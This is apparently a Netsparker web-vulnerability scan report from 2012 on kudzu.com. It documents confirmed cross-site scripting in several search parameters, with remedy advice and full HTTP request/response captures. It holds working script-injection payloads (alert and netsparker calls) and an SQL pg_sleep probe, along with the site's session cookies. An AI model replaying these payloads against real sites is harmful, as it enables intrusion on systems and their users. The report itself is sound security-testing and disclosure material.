Stored XSS, Permanent Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, kudzu.com, 01192012



Netsparker - Scan Report Summary
TARGET URL
http://www.kudzu.com/controller.jsp?N=0&searc...
SCAN DATE
1/19/2012 7:26:15 AM
REPORT DATE
1/19/2012 8:02:36 AM
SCAN DURATION
00:09:29

Total Requests

677

Average Speed

1.19 req/sec.
14
identified
6
confirmed
0
critical
3
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
36 %
LOW
43 %
INFORMATION
21 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/controller.jsp searchVal GET Cross-site Scripting Yes
currentLocation GET Cross-site Scripting Yes
searchType GET Cross-site Scripting Yes
Permanent Cross-site Scripting Yes
[Possible] Permanent Cross-site Scripting No
N GET Internal Server Error Yes
Cookie Not Marked As HttpOnly Yes
Apache Version Disclosure No
OpenSSL Version Disclosure No
Apache Module Version Disclosure No
[Possible] Internal IP Address Leakage No
E-mail Address Disclosure No
Apache Version Is Out Of Date No
[Possible] Internal Path Leakage (Windows) No
Cross-site Scripting

Cross-site Scripting

3 TOTAL
IMPORTANT
CONFIRMED
3
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /controller.jsp

/controller.jsp CONFIRMED

http://www.kudzu.com/controller.jsp?N=0&searchVal='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..

Parameters

Parameter Type Value
N GET 0
searchVal GET '"--></style></script><script>alert(0x000029)</script>
currentLocation GET new york city
searchType GET keyword
Ns GET P_PremiumPlacementce97c"><script>alert(1)</script>cf1e0696b9a

Request

GET /controller.jsp?N=0&searchVal='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000029)%3C/script%3E¤tLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.kudzu.com
Cookie: logs=174.36.218.2.1326979536100593; JSESSIONID=1BD5B5BEC068570C97291D70570FCCA4.coxsearchtc1; RECENT_SEARCH=plumber+electrician&New+York%2C+NY+10012|%27%3BSELECT+pg_sleep%2825%29--&New+York%2C+NY+10012|plumber+electrician&Woodston%2C+KS+67675; ERROR=; locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Woodston&ZZZState=KS&ZZZZip=67675&ZZZLatitude=39.527596&ZZZLongitude=-99.141968&ZZZName=Woodston%2C+KS++67675&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Post&ZZZState=OR&ZZZZip=97752&ZZZLatitude=44.131691&ZZZLongitude=-120.359001&ZZZName=Post%2C+OR++97752&ZZZDefault=false&ZZZCookieVersion=1.0|"
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:26:19 GMT
Server: Apache/2.0.63 (Unix) DAV/2 mod_ssl/2.0.63 OpenSSL/0.9.8e mod_jk/1.2.26
Set-Cookie: locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Woodston&ZZZState=KS&ZZZZip=67675&ZZZLatitude=39.527596&ZZZLongitude=-99.141968&ZZZName=Woodston%2C+KS++67675&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Post&ZZZState=OR&ZZZZip=97752&ZZZLatitude=44.131691&ZZZLongitude=-120.359001&ZZZName=Post%2C+OR++97752&ZZZDefault=false&ZZZCookieVersion=1.0|"; Domain=kudzu.com; Expires=Fri, 18-Jan-2013 13:26:19 GMT; Path=/,RECENT_SEARCH=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000029%29%3C%2Fscript%3E&New+York%2C+NY+10012|plumber+electrician&New+York%2C+NY+10012|%27%3BSELECT+pg_sleep%2825%29--&New+York%2C+NY+10012; Domain=www.kudzu.com; Expires=Fri, 18-Jan-2013 13:26:19 GMT
Cache-Control: no-cache,max-age=0
Expires: 0
Pragma: No-cache
Transfer-Encoding: chunked
Content-Type: text/html

















<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<!-- google_ad_section_start -->
<title>Kudzu.com :: Kudzu.com :: We're Sorry</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta property="fb:app_id" content="287431397950764"/>
<meta name="description" content="Kudzu.com is where to find the best - and avoid the worst - in New York, NY. Local reviews and ratings of restaurants, doctors, mechanics, home services, beauty salons, daycare, and more." />
<meta name="keywords" content="Reviews, Ratings, Recommendations, Local Advertising, Yellow Pages, Restaurants, Doctors, Mechanics, Day Care, Beauty Salons, Preschools" />

<!-- google_ad_section_end -->

<link href="/css/style.css?2" rel="stylesheet" type="text/css">
<script language="JavaScript" src="/javascript/searchUtil.js"></script>

</head>
<body>
<!--header section-->





























<script type='text/javascript' src='/dwr/engine.js'></script>
<script type='text/javascript' src='/dwr/util.js'></script>
<script type='text/javascript' src="/javascript/jquery/jquery-1.3.2.min.js"></script>
<script type='text/javascript' src="/javascript/jquery/qs.js"></script>
<script type='text/javascript' src='/dwr/interface/ValidateSearchParameters.js'></script>

<script>
var thirdParty = false;
</script>



<link href="/css/autoComplete.css?2" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/javascript/autocomplete/autocomplete.js"></script>


<script type="text/javascript" src="/javascript/searchScript.js"></script>
<script type="text/javascript" src="/javascript/navigation.js"></script>
<script language="javascript" src="/javascript/popup.js"></script>

<div align="center" class="bgImage">
<div id="container">
<div style="background:#fff">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td align="left" valign="middle" style="padding:5px 10px">

<iframe src="/userBar.jsp" id="userbar" height="18" width="700" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe>

</td>
<td align="right" valign="middle" style="padding:5px 10px">
<a href="http://www.hgtv.com/"><img src="/img/txt_hgtvdiy.gif" border="0" /></a><br />
</td>
</tr>
<tr>
<td colspan="2" background="/img/topshadow.png"><img src="/img/spacer.gif" width="1" height="4" /><br /></td>
</tr>
</table>
</div>
<table cellpadding="0" cellspacing="0" border="0" class="topBg" width="100%">
<tr>
<td align="left" valign="top" style="width:197px;padding-top:3px">
<a href="/"><img src="/img/logo_header.jpg" border="0" /></a><br />
</td>
<td align="right" valign="top" style="padding-top:26px;padding-right:5px;width:803px">
<div style="min-height:90px">
<div class="ad728x90"><table align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><div><script language="JavaScript" type="text/JavaScript"> <!--ord=Math.random()*10000000000000000;document.write('<SCR' + 'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/kudzu.cox/cafemom;industry=cafemom;tn=1;tcs=0;tcp=0;to=h;tbw=0;te=1;s_word=cafemom;sz=728x90;ord='+ord+'?"></SCR' + 'IPT>'); //--></script></div></td></tr></table></div>
</div>
<div style="text-align:left;padding-top:27px;padding-right:5px;z-index:10">
<script language="javascript" src="/content/includes_kudzu/javascript/navigation.js"></script>
</div>
</td>
</tr>
<tr>
<td colspan="2" align="center" style="padding:25px 0px">
<div>
<form action="Javascript:Search()" name="search_terms_form">
<input name="searchBy" id="searchBy" type="hidden" value="keyword" />
<table cellspacing="0" cellpadding="0" border="0" style="width:825px">
<tr>
<td align="left" style="padding:0px 3px 0px 0px">
<div class="navtext navtext-findapro">Find a Pro:<br /></div>
</td>
<td align="left" valign="middle">
<div id="testtest_search">
<input type='text' id='searchterms' name='searchterms' value="'&quot;--></style></script><script>netsparker(0x000029)</script>" style='width:190px;font-size:14px;padding:6px;border:1px solid #999999' size='40' onblur='onSuggestionFocusLost(this)' onkeydown='onSuggestionKeyDown(this, event)' onkeyup='onSuggestionKeyUp(this, event, 4, getDataUrl_searchterms())' autocomplete='off' /><br /><div id='searchterms_suggest' class='autoComplete' ></div><script type='text/javascript' language='javascript'>function searchterms_onServerResponse() {if(req.readyState!=4) { return; }if(req.status != 200) {return;}var responseData = req.responseText;var curControl = document.getElementById('searchterms');var responseData = req.responseText;var dataValues=eval('(' + responseData + ')');populateSuggestionList(curControl, dataValues);}function getDataUrl_searchterms() {var curControl = document.getElementById('searchterms');var dataUrl = '/JQueryJsonAutoCompleteData?format=json&chosenLocationZip=10012&criteria=' + curControl.value + '&maxCount=10&providerClass=com.coxsearch.autocomplete.bll.SearchValueProvider';return dataUrl;}</script>
</div>
</td>
<td align="left" style="padding:0px 3px 0px 5px">
<div class="navtext navtext-closeto">Close to:<br /></div>
</td>
<td align="left" valign="middle" nowrap>
<div id="locations">
<input name="location" id="currentLocation" type="text" class="searchBox" style="width:190px;font-size:14px;padding:6px;border:1px solid #999999" value="New York, NY 10012" />
<a href="javascript:void(0);" onClick="setLocsDiv();"><img name="downButton" id="downButton" src="/img/btn_saved.gif" border="0" align="top" style="margin-top:5px;margin-left:1px" onload="setMouse()"></a>
</div>
<div style="position:relative;z-index:30">
<div name="locsDiv" id="locsDiv" style="visibility:hidden;position:absolute;z-index:1000;top:2px;background-color:#FFFFFF;border-top:1px solid #555555;border-left:1px solid #555555;border-right:2px solid #444444;border-bottom:2px solid #333333">
<div style="padding:5px">
<table cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Recent Searches:</span><br />
<div id="recentContent" style="display:none;position:relative;z-index:1010;"><iframe id= "recentframe" src="/my_recentLocationsList.jsp" width="180" height="100" scrolling="no" frameborder="0" name="content"></iframe></div><div id="noContent" style="display:none;">No recent locations</div>
</td>
<td valign="top" align="right"><img src="/img/map/cls.gif" onClick="hide_savedLocs()"></td>
</tr>
<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2">
<br />
<a href="javascript:void()" onClick="return resetCookie();">Clear recent searches</a><br />
</td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td colspan="2" width="100%"><table width="100%" cellpadding="0" cellspacing="0" bgcolor="#999999"><tr><td width="100%" bgcolor="#999999"><img src="/img/spacer.gif"></td></tr></table></td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Your Saved Locations:</span><br>
<div id="iframe" style="display:none;position:relative;z-index:1005;"><a href="/myLocationsAction.do">Please log in to use Saved Locations</a></div></td>
<td valign="top" align="right"></td>
</tr>

<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2"><a href="/myLocationsAction.do">Add/Edit saved locations</a><br /></td>
</tr>
</table>
</div></div></div></td>
<td valign="middle" align="left" nowrap="nowrap" style="padding-top:2px;padding-right:10px">
<input type="submit" value="" name="submit" border="0" align="absmiddle" class="navtext navtext-search" />
</td>
<td nowrap align="left" valign="middle">

<iframe id="kadr88x31" src="/DoubleClickFrame.jsp?adType=HEADER_88X31&bucket='"--></style></script><script>netsparker(0x000029)</script>&adify=false&cafemom=false&hgtvad=false" width="88" height="31" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" allowtransparency="true"></iframe>
</td>
</tr>
<tr>
<td colspan="3">
</td>
<td align="left">
<div id="locationStatus" style="color: red;"></div>
</td>
</tr>
</table>
</form>
</div>
</td>
</tr>
</table>


<script>
$(document).ready(function() {
});
</script>







<!--content table-->

<div class="pageHead">
<h1></h1>
</div>
<div class="pagePadding pageSpacing" style="padding-bottom:20px">
<table border="0" cellpadding="0" cellspacing="0">











<!--breadcrumb-->
<!--end breadcrumb-->
<!--content table-->
<table border="0" cellpadding="0" cellspacing="0" width="1000" class="errorPage">
<tr>
<td valign="top" style="padding:0px 30px 20px">
<table border="0" cellpadding="0" cellspacing="0" width="650">
<tr>
<td colspan="2" valign="top" style="font-size:13px;padding-bottom:15px"><span class="form_textheader errorHeading"> We're sorry, no results were found

for <div class="linkColor" style="display:inline;font-weight:bold;font-size:20px;padding:0px 10px;">'"--></style></script><script>netsparker(0x000029)</script></div> in or near <b>New York, NY 10012</b>

on Kudzu.com.</span><br><br />



<div style="font-size:13px;padding:0px 0px 15px">We currently have no suggestions for that Keyword.</div>



<div style="background:#ffffff;margin:0px 20px" class="helpBox">
<div class="box4"><div class="box3"><div class="box2"><div class="box1">

<b>Try these suggestions:</b>
<ul style="margin-bottom:5px">
<li>Make sure you are spelling your search words correctly and try using keywords with similar meaning.</li>
<li>Use more general keywords or phrases.</li>
<li>Use fewer keywords.</li>
<li>Change the Address, City &amp; State or Zip.
<li>You can also <a href="/browse.do">browse our business categories</a>.</li>

</ul>
</div></div></div></div>
</div>
</td>
</tr>
<tr>
<td colspan="2">
<div class="errorSection" style="width:500px">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td align="left" style="border-right:1px solid #cccccc;padding:10px 0px 5px">
<b>Can't find a business?</b><br />
Think they should be on Kudzu?<br />
<a href="/addMerchant.do"><b>Click here to add them!</b></a><br />
</td>
<td align="right" style="padding:10px 0px 5px">
<b>Are you a business owner?</b><br />
Can't find your business on Kudzu?<br />
<a href="https://register.kudzu.com/packageSelect.do"><b>..
- /controller.jsp

/controller.jsp CONFIRMED

http://www.kudzu.com/controller.jsp?N=0&searchVal=plumber%20electrician&currentLocation='%3E%3Cscrip..

Parameters

Parameter Type Value
N GET 0
searchVal GET plumber electrician
currentLocation GET '><script>alert(9)</script>
searchType GET keyword
Ns GET P_PremiumPlacementce97c"><script>alert(1)</script>cf1e0696b9a

Request

GET /controller.jsp?N=0&searchVal=plumber%20electrician¤tLocation='%3E%3Cscript%3Enetsparker(9)%3C/script%3E&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.kudzu.com
Cookie: logs=174.36.218.2.1326979536100593; JSESSIONID=1BD5B5BEC068570C97291D70570FCCA4.coxsearchtc1; RECENT_SEARCH=plumber+electrician&New+York%2C+NY+10012|plumber+electrician&Woodston%2C+KS+67675|%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000029%29%3C%2Fscript%3E&New+York%2C+NY+10012; ERROR=; locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Woodston&ZZZState=KS&ZZZZip=67675&ZZZLatitude=39.527596&ZZZLongitude=-99.141968&ZZZName=Woodston%2C+KS++67675&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Post&ZZZState=OR&ZZZZip=97752&ZZZLatitude=44.131691&ZZZLongitude=-120.359001&ZZZName=Post%2C+OR++97752&ZZZDefault=false&ZZZCookieVersion=1.0|"
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:26:34 GMT
Server: Apache/2.0.63 (Unix) DAV/2 mod_ssl/2.0.63 OpenSSL/0.9.8e mod_jk/1.2.26
Set-Cookie: locations="ZZZStreet=&ZZZCity=Woodston&ZZZState=KS&ZZZZip=67675&ZZZLatitude=39.527596&ZZZLongitude=-99.141968&ZZZName=Woodston%2C+KS++67675&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Post&ZZZState=OR&ZZZZip=97752&ZZZLatitude=44.131691&ZZZLongitude=-120.359001&ZZZName=Post%2C+OR++97752&ZZZDefault=false&ZZZCookieVersion=1.0|"; Domain=kudzu.com; Expires=Fri, 18-Jan-2013 13:26:34 GMT; Path=/,RECENT_SEARCH=plumber+electrician&Woodston%2C+KS+67675|plumber+electrician&New+York%2C+NY+10012|%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000029%29%3C%2Fscript%3E&New+York%2C+NY+10012; Domain=www.kudzu.com; Expires=Fri, 18-Jan-2013 13:26:34 GMT
Cache-Control: no-cache,max-age=0
Expires: 0
Pragma: No-cache
Transfer-Encoding: chunked
Content-Type: text/html

























<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>


<!-- google_ad_section_start -->
<title>plumber electrician in Woodston, KS - Kudzu.com</title>
<meta name="description" content="Looking for plumber electrician in Woodston, KS? Get reviews, maps & directions and more for Woodston, KS plumber electrician on Kudzu.com.">
<meta name="keywords" content="Woodston KS plumber electrician, Woodston KS plumber electrician reviews, Best plumber electrician in Woodston KS, plumber electrician locations">
<!-- google_ad_section_end -->
<meta name="ROBOTS" content="NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css?2" rel="stylesheet" type="text/css">
<link href="/css/results.css?2" rel="stylesheet" type="text/css">

<script language="JavaScript" src="/javascript/searchUtil.js"></script>
<script language="JavaScript">
function recordOmnitureEvent( companyid ) {
<!-- OnClickProfileMark-->
}

function getMoreFBReviews() {
document.getElementById('clickForMore').innerHTML = '<span style="color:gray">loading...&nbsp;&nbsp;</span>';
FacebookFriendReviews.getFriendsAndReviews( 67675, -1, 8, loadMoreFBReviews );
}

function getFBFriendReviews() {
FacebookFriendReviews.getFriendsAndReviews( 67675, -1, 3, createFBReviewsBox );
}


function facebookLoad() {
document.getElementById('fbReviewsDefault').style.display = 'none';
document.getElementById('fbReviewsBox').style.display = 'block';
getFBFriendReviews();
}

</script>
</head>


<body>


<input type="hidden" id="keyword" value="plumber electrician"/>
<input type="hidden" id="zip" value="67675"/>






























<script type='text/javascript' src='/dwr/engine.js'></script>
<script type='text/javascript' src='/dwr/util.js'></script>
<script type='text/javascript' src="/javascript/jquery/jquery-1.3.2.min.js"></script>
<script type='text/javascript' src="/javascript/jquery/qs.js"></script>
<script type='text/javascript' src='/dwr/interface/ValidateSearchParameters.js'></script>

<script>
var thirdParty = false;
</script>



<link href="/css/autoComplete.css?2" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/javascript/autocomplete/autocomplete.js"></script>


<script type="text/javascript" src="/javascript/searchScript.js"></script>
<script type="text/javascript" src="/javascript/navigation.js"></script>
<script language="javascript" src="/javascript/popup.js"></script>

<div align="center" class="bgImage">
<div id="container">
<div style="background:#fff">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td align="left" valign="middle" style="padding:5px 10px">

<iframe src="/userBar.jsp" id="userbar" height="18" width="700" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe>

</td>
<td align="right" valign="middle" style="padding:5px 10px">
<a href="http://www.hgtv.com/"><img src="/img/txt_hgtvdiy.gif" border="0" /></a><br />
</td>
</tr>
<tr>
<td colspan="2" background="/img/topshadow.png"><img src="/img/spacer.gif" width="1" height="4" /><br /></td>
</tr>
</table>
</div>
<table cellpadding="0" cellspacing="0" border="0" class="topBg" width="100%">
<tr>
<td align="left" valign="top" style="width:197px;padding-top:3px">
<a href="/"><img src="/img/logo_header.jpg" border="0" /></a><br />
</td>
<td align="right" valign="top" style="padding-top:26px;padding-right:5px;width:803px">
<div style="min-height:90px">
<div class="ad728x90"><table align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><div><script language="JavaScript" type="text/JavaScript"> <!--ord=Math.random()*10000000000000000;document.write('<SCR' + 'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/kudzu.cox/cafemom;industry=cafemom;tn=1;tcs=0;tcp=0;to=h;tbw=0;te=1;s_word=cafemom;sz=728x90;ord='+ord+'?"></SCR' + 'IPT>'); //--></script></div></td></tr></table></div>
</div>
<div style="text-align:left;padding-top:27px;padding-right:5px;z-index:10">
<script language="javascript" src="/content/includes_kudzu/javascript/navigation.js"></script>
</div>
</td>
</tr>
<tr>
<td colspan="2" align="center" style="padding:25px 0px">
<div>
<form action="Javascript:Search()" name="search_terms_form">
<input name="searchBy" id="searchBy" type="hidden" value="keyword" />
<table cellspacing="0" cellpadding="0" border="0" style="width:825px">
<tr>
<td align="left" style="padding:0px 3px 0px 0px">
<div class="navtext navtext-findapro">Find a Pro:<br /></div>
</td>
<td align="left" valign="middle">
<div id="testtest_search">
<input type='text' id='searchterms' name='searchterms' value="plumber electrician" style='width:190px;font-size:14px;padding:6px;border:1px solid #999999' size='40' onblur='onSuggestionFocusLost(this)' onkeydown='onSuggestionKeyDown(this, event)' onkeyup='onSuggestionKeyUp(this, event, 4, getDataUrl_searchterms())' autocomplete='off' /><br /><div id='searchterms_suggest' class='autoComplete' ></div><script type='text/javascript' language='javascript'>function searchterms_onServerResponse() {if(req.readyState!=4) { return; }if(req.status != 200) {return;}var responseData = req.responseText;var curControl = document.getElementById('searchterms');var responseData = req.responseText;var dataValues=eval('(' + responseData + ')');populateSuggestionList(curControl, dataValues);}function getDataUrl_searchterms() {var curControl = document.getElementById('searchterms');var dataUrl = '/JQueryJsonAutoCompleteData?format=json&chosenLocationZip=67675&criteria=' + curControl.value + '&maxCount=10&providerClass=com.coxsearch.autocomplete.bll.SearchValueProvider';return dataUrl;}</script>
</div>
</td>
<td align="left" style="padding:0px 3px 0px 5px">
<div class="navtext navtext-closeto">Close to:<br /></div>
</td>
<td align="left" valign="middle" nowrap>
<div id="locations">
<input name="location" id="currentLocation" type="text" class="searchBox" style="width:190px;font-size:14px;padding:6px;border:1px solid #999999" value="Woodston, KS 67675" />
<a href="javascript:void(0);" onClick="setLocsDiv();"><img name="downButton" id="downButton" src="/img/btn_saved.gif" border="0" align="top" style="margin-top:5px;margin-left:1px" onload="setMouse()"></a>
</div>
<div style="position:relative;z-index:30">
<div name="locsDiv" id="locsDiv" style="visibility:hidden;position:absolute;z-index:1000;top:2px;background-color:#FFFFFF;border-top:1px solid #555555;border-left:1px solid #555555;border-right:2px solid #444444;border-bottom:2px solid #333333">
<div style="padding:5px">
<table cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Recent Searches:</span><br />
<div id="recentContent" style="display:none;position:relative;z-index:1010;"><iframe id= "recentframe" src="/my_recentLocationsList.jsp" width="180" height="100" scrolling="no" frameborder="0" name="content"></iframe></div><div id="noContent" style="display:none;">No recent locations</div>
</td>
<td valign="top" align="right"><img src="/img/map/cls.gif" onClick="hide_savedLocs()"></td>
</tr>
<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2">
<br />
<a href="javascript:void()" onClick="return resetCookie();">Clear recent searches</a><br />
</td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td colspan="2" width="100%"><table width="100%" cellpadding="0" cellspacing="0" bgcolor="#999999"><tr><td width="100%" bgcolor="#999999"><img src="/img/spacer.gif"></td></tr></table></td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Your Saved Locations:</span><br>
<div id="iframe" style="display:none;position:relative;z-index:1005;"><a href="/myLocationsAction.do">Please log in to use Saved Locations</a></div></td>
<td valign="top" align="right"></td>
</tr>

<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2"><a href="/myLocationsAction.do">Add/Edit saved locations</a><br /></td>
</tr>
</table>
</div></div></div></td>
<td valign="middle" align="left" nowrap="nowrap" style="padding-top:2px;padding-right:10px">
<input type="submit" value="" name="submit" border="0" align="absmiddle" class="navtext navtext-search" />
</td>
<td nowrap align="left" valign="middle">

<iframe id="kadr88x31" src="/DoubleClickFrame.jsp?adType=HEADER_88X31&bucket=plumber electrician&adify=false&cafemom=false&hgtvad=false" width="88" height="31" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" allowtransparency="true"></iframe>
</td>
</tr>
<tr>
<td colspan="3">
</td>
<td align="left">
<div id="locationStatus" style="color: red;"></div>
</td>
</tr>
</table>
</form>
</div>
</td>
</tr>
</table>


<script>
$(document).ready(function() {
});
</script>



<!-- No image available for request!!! Is bucket turned on for the market?-->





<!-- loginErrorMessages.jsp -->


<!-- end loginErrorMessages.jsp -->
<table cellpadding="0" cellspacing="0" border="0" width="1000" style="text-align:left">
<tr>
<td class="refine" colspan="2"><img src="http://images.kudzu.com/img/misc/txt_refine.gif" alt="Refine" /><br /></td>
<td colspan="3" align="left" style="font-size:14px">

Displaying results <b>1 - 1</b> of <b>1</b> for
<!-- ProfileMark -->
<h1 class="results">Woodston plumber electrician</h1>
</td>
</tr>
<tr>
<!-- ExcludeProfileMark -->
<td rowspan="2" valign="top" align="left" class="leftBox">
<table cellpadding="0" cellspacing="0" border="0" width="180">
<tr>
<td valign="top" style="padding-left:10px;padding-bottom:10px">
<div class="showResults" style="margin-bottom:10px">
<div class="box4"><div class="box3"><div class="box2"><div class="box1">
<div style="padding-bottom:5px;" class="txtHeader">Show results within</div>
&nbsp;&nbsp;<select name="distance" onChange="self.location=this.options[this.selectedIndex].value" style="font-size:10px;font-family:Verdana, Helvetica, sans-serif; ">

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation='%3E%3Cscript%3Enetsparker(9)%3C/script%3E&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=160.93470878864446">
<center>
100
</center>
</option>


<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation='%3E%3Cscript%3Enetsparker(9)%3C/script%3E&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=80.46735439432223" selected>

<center>
50
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation='%3E%3Cscript%3Enetsparker(9)%3C/script%3E&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=40.233677197161114">

<center>
25
</center>
</option>
..
- /controller.jsp

/controller.jsp CONFIRMED

http://www.kudzu.com/controller.jsp?N=0&searchVal=plumber%20electrician&currentLocation=new%20york%2..

Parameters

Parameter Type Value
N GET 0
searchVal GET plumber electrician
currentLocation GET new york city
searchType GET '"--></style></script><script>alert(0x00002B)</script>
Ns GET P_PremiumPlacementce97c"><script>alert(1)</script>cf1e0696b9a

Request

GET /controller.jsp?N=0&searchVal=plumber%20electrician¤tLocation=new%20york%20city&searchType='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00002B)%3C/script%3E&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
